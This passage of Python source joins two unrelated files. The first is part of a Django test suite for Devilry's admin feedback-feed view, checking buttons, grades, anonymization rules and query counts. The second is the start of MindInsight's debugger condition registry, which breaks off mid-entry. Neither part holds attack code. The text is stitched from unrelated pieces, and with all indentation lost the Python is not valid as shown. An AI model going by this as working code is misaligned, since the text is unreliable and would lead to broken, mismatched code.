mockinstance = mock.MagicMock()
mockinstance.get_devilryrole_for_requestuser.return_value = 'admin'
return mockinstance
def test_get(self):
candidate = baker.make('core.Candidate',
relatedstudent=baker.make('core.RelatedStudent'))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=candidate.assignment_group,
requestuser=candidate.relatedstudent.user)
self.assertEqual(mockresponse.selector.one('title').alltext_normalized,
candidate.assignment_group.assignment.get_path())
def test_move_deadline_button_rendered_if_deadline_expired_and_feedbackset_is_not_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup,
deadline_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
def test_move_deadline_button_not_rendered_if_deadline_expired_and_feedbackset_is_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup, deadline_datetime=deadline_datetime, grading_published_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
def test_new_attempt_button_rendered_if_deadline_expired_and_feedbackset_is_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup, deadline_datetime=deadline_datetime, grading_published_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
def test_new_attempt_button_not_rendered_if_deadline_expired_and_feedbackset_not_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_unpublished(
group=testgroup, deadline_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
def test_assignment_deadline_hard_expired_comment_form_rendered(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
test_feedbackset = baker.make('devilry_group.FeedbackSet',
deadline_datetime=deadline_datetime,
group__parentnode__deadline_handling=core_models.Assignment.DEADLINEHANDLING_HARD,
group__parentnode__parentnode=baker.make_recipe(
'devilry.apps.core.period_active'))
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.cradmin-legacy-form-wrapper'))
self.assertFalse(mockresponse.selector.exists('.devilry-feedbackfeed-form-disabled'))
def test_get_examiner_discuss_tab_buttons(self):
testgroup = baker.make('core.AssignmentGroup')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup)
self.assertEqual(2, mockresponse.selector.count('.devilry-group-feedbackfeed-discuss-button'))
def test_get_feedbackfeed_event_delivery_passed(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
max_points=10,
passing_grade_min_points=5)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup,
grading_points=7)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=feedbackset.group)
self.assertTrue(mockresponse.selector.exists('.devilry-core-grade-passed'))
self.assertFalse(mockresponse.selector.exists('.devilry-core-grade-failed'))
def test_get_feedbackfeed_event_delivery_failed(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
max_points=10,
passing_grade_min_points=5)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup,
grading_points=0)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=feedbackset.group)
self.assertTrue(mockresponse.selector.exists('.devilry-core-grade-failed'))
self.assertFalse(mockresponse.selector.exists('.devilry-core-grade-passed'))
def test_get_feedbackfeed_periodadmin(self):
period = baker.make('core.Period')
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
admin = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
comment = baker.make('devilry_group.GroupComment',
user_role='admin',
user=admin,
text='Hello, is it me you\'re looking for?',
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=comment.feedback_set.group)
self.assertEqual(
'periodadmin',
PeriodPermissionGroup.objects.get_devilryrole_for_user_on_period(
period=period, user=admin))
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-comment-admin'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_comment_admin(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor the norse god')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin],
parentnode__admins=[baker.make('devilry_account.User', shortname='subjectadmin')],
parentnode__parentnode__admins=[baker.make('devilry_account.User',
shortname='nodeadmin')])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
admin = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
comment = baker.make('devilry_group.GroupComment',
user_role='admin',
user=admin,
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=comment.feedback_set.group)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-comment-admin'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_periodadmin_raise_404_semi_anonymous(self):
# Mock the crinstance's get_devilryrole_for_requestuser to return the user role directly.
# Mocking the return value is easier to read than creating a permission
# group (the crinstance function with permission groups is tested separately for the instance).
testperiod = baker.make('core.Period')
testassignment = baker.make('core.Assignment',
parentnode=testperiod,
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_periodadmin_raise_404_fully_anonymous(self):
# Mock the crinstance's get_devilryrole_for_requestuser to return the user role directly.
# Mocking the return value is easier to read than creating a permission
# group (the crinstance function with permission groups is tested separately for the instance).
testperiod = baker.make('core.Period')
testassignment = baker.make('core.Assignment',
parentnode=testperiod,
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_subjectadmin_can_see_student_name_semi_anonymous(self):
# Mock the crinstance's get_devilryrole_for_requestuser to return the user role directly.
# Mocking the return value is easier to read than creating a permission
# group (the crinstance function with permission groups is tested separately for the instance).
testassignment = baker.make('core.Assignment',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
candidate = baker.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__shortname='teststudent')
baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset)
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertFalse(mockresponse.selector.exists('.devilry-core-candidate-anonymous-name'))
self.assertTrue(mockresponse.selector.exists('.devilry-user-verbose-inline'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_subjectadmin_raise_404_fully_anonymous(self):
# Mock the crinstance's get_devilryrole_for_requestuser to return the user role directly.
# Mocking the return value is easier to read than creating a permission
# group (the crinstance function with permission groups is tested separately for the instance).
testassignment = baker.make('core.Assignment',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_periodadmin_no_access(self):
# Periodadmin does not have access to the view when the user is not periodadmin for that period.
period1 = baker.make('core.Period')
period2 = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL)
permissiongroup = baker.make('devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period2)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=permissiongroup.permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period1)
mockrequest = mock.MagicMock()
mockrequest.user = admin
mockrequest.cradmin_role = testgroup
crinstance = crinstance_admin.AdminCrInstance(request=mockrequest)
with self.assertRaises(Http404):
self.mock_getrequest(cradmin_role=testgroup, cradmin_instance=crinstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_subjectadmin_no_access(self):
# Subjectadmin does not have access to the view when the user is not subjectadmin for that subject.
subject1 = baker.make('core.Subject')
subject2 = baker.make('core.Subject')
admin = baker.make(settings.AUTH_USER_MODEL)
permissiongroup = baker.make('devilry_account.SubjectPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_SUBJECTADMIN,
subject=subject2)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=permissiongroup.permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode__parentnode=subject1)
mockrequest = mock.MagicMock()
mockrequest.user = admin
mockrequest.cradmin_role = testgroup
crinstance = crinstance_admin.AdminCrInstance(request=mockrequest)
with self.assertRaises(Http404):
self.mock_getrequest(cradmin_role=testgroup, cradmin_instance=crinstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_download_visible_public_commentfiles_exist(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
group_comment = baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
feedback_set=testfeedbackset)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertTrue(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_feedbackfeed_download_not_visible_private_commentfile_exist(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
testuser = baker.make(settings.AUTH_USER_MODEL)
group_comment = baker.make('devilry_group.GroupComment',
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_PRIVATE)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertFalse(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_feedbackfeed_download_not_visible_part_of_grading_not_published(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
testuser = baker.make(settings.AUTH_USER_MODEL)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
group_comment = baker.make('devilry_group.GroupComment',
feedback_set=testfeedbackset,
user=examiner.relatedexaminer.user,
user_role='examiner',
part_of_grading=True)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertFalse(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_no_edit_link_for_other_users_comments(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_group.GroupComment',
user_role='examiner',
feedback_set=feedbackset)
baker.make('devilry_group.GroupComment',
user_role='student',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup, requestuser=admin)
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__student'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__examiner'))
def test_get_edit_link(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_group.GroupComment',
user=admin,
user_role='admin',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin)
self.assertTrue(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertEqual('Edit',
mockresponse.selector.one('.devilry-group-comment-edit-link__admin').alltext_normalized)
def test_get_edit_link_url(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
groupcomment = baker.make('devilry_group.GroupComment',
user=admin,
user_role='admin',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin)
self.assertTrue(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertEqual(mockresponse.selector.one('.devilry-group-comment-edit-link__admin').get('href'),
'/devilry_group/admin/{}/feedbackfeed/groupcomment-edit/{}'.format(
testgroup.id, groupcomment.id))
def test_get_num_queries(self):
period = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('core.Candidate', assignment_group=testgroup, _quantity=50)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
baker.make('core.Examiner', assignmentgroup=testgroup, _quantity=50)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset,
_quantity=20)
baker.make('devilry_group.GroupComment',
user=examiner.relatedexaminer.user,
user_role='examiner',
feedback_set=testfeedbackset,
_quantity=20)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertNumQueries(18):
self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin,
cradmin_instance=mock_cradmininstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_num_queries_with_commentfiles(self):
"""
NOTE: (works as it should)
Checking that no more queries are executed even though the
:func:`devilry.devilry_group.feedbackfeed_builder.FeedbackFeedTimelineBuilder.__get_feedbackset_queryset`
duplicates comment_file query.
"""
period = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('core.Candidate', assignment_group=testgroup, _quantity=50)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
baker.make('core.Examiner', assignmentgroup=testgroup, _quantity=50)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
comment = baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset)
comment2 = baker.make('devilry_group.GroupComment',
user=examiner.relatedexaminer.user,
user_role='examiner',
feedback_set=testfeedbackset)
baker.make('devilry_comment.CommentFile',
filename='test.py',
comment=comment,
_quantity=20)
baker.make('devilry_comment.CommentFile',
filename='test2.py',
comment=comment2,
_quantity=20)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertNumQueries(18):
self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin,
cradmin_instance=mock_cradmininstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
# mindinsight/debugger/conditionmgr/condition_list.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Condition list.
This module provides the detailed list of conditions.
"""
from mindinsight.debugger.conditionmgr.condition import Condition
from mindinsight.debugger.conditionmgr.condition import OptimizePhaseEnum
from mindinsight.debugger.conditionmgr.condition import ConditionParameter
from mindinsight.debugger.conditionmgr.condition import ValueTypeEnum
from mindinsight.debugger.conditionmgr.condition import TargetTypeEnum
from mindinsight.debugger.conditionmgr.condition import PlatformEnum
from mindinsight.debugger.conditionmgr.condition import ParamTypeEnum
from mindinsight.debugger.conditionmgr.condition import ConditionIdEnum
from mindinsight.debugger.conditionmgr.condition import ParamNameEnum
from mindinsight.debugger.conditionmgr.condition import check_initialization_available
from mindinsight.debugger.conditionmgr.condition import check_normal_param_range
from mindinsight.debugger.conditionmgr.condition import check_percentage_param_range
from mindinsight.debugger.conditionmgr.condition import check_abs_param_range, check_positive_param_range
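# Illustrative only (not part of the module): CONDITION_LIST below is a flat
# registry, so callers can filter it with a plain comprehension, e.g.:
#
#     weight_conditions = [
#         condition for condition in CONDITION_LIST
#         if condition.supported_target_type == TargetTypeEnum.WEIGHT
#     ]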
CONDITION_LIST = [
Condition(
condition_id=ConditionIdEnum.WEIGHT_INITIALIZATION,
abbr="WI",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_initialization
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ZERO_PERCENTAGE_GE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
default_value=100
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1),
availability_test_func=check_initialization_available
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_OVERFLOW,
abbr="WO",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_TOO_LARGE,
abbr="WL",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_TOO_SMALL,
abbr="WS",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_VANISHING,
abbr="GV",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_TOO_LARGE,
abbr="GL",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_EXPLODING,
abbr="GE",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_OVERFLOW,
abbr="TO",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.OPERATOR_OVERFLOW,
abbr="OO",
# When sent to MindSpore, this condition uses WatchCondition.Condition.overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND,),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_TOO_LARGE,
abbr="TL",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_TOO_SMALL,
abbr="TS",
# When sent to MindSpore, this condition uses WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
